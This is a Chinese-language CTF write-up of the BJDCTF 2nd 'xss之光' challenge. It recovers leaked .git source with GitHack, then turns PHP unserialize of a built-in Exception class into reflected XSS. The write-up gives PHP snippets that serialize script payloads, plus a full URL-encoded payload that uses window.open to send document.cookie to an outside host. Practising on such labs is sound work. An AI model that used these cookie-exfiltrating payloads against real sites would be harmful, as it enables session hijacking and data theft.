知识点
-
.git文件泄露:GitHack使用方法
-
XSS攻击
- 定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
32-1 [BJDCTF 2nd]xss之光
做题思路
借鉴 WP
扫后台,有.git 泄露
githack下载下来python GitHack.py http://1b71bcdf-e2a2-4ddf-af5c-5c001df75d3f.node3.buuoj.cn/.git
得到源码
<?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a);
可触发序列化中的魔术方法__toString
__toString的原生类:ERROR 适用于php7版本
Error类就是php的一个内置类用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方法。
EXCEPTION 适用于php5、7版本
这个类利用的方式和原理和Error 类一模一样,但是适用于php5和php7,相对之下更加好用<?php $y1ng = new Exception("<script>window.open('url/?'+document.cookie);</script>"); echo urlencode(serialize($y1ng)); ?> //window.open 是 javaScript 打开新窗口的方法 也可以用window.location.href='url'来实现恶意跳转 <?php $a = new Exception("<script>window.location.href='url'+document.cookie</script>"); echo urlencode(serialize($a)); ?> 或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly(见附录)。 <?php $y1ng = new Exception("<script>alert(document.cookie)</script>"); echo urlencode(serialize($y1ng)); ?>
得到编码后的变量
?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A110%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2F68d1a13c-abde-4bcc-aa80-eb78d3e543cc.node3.buuoj.cn%2F%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
输入之后得到
不懂,由WP得知flag在cookie中
url解码即得到 flag
说实话,这个几乎都不懂,感觉没有学到什么东西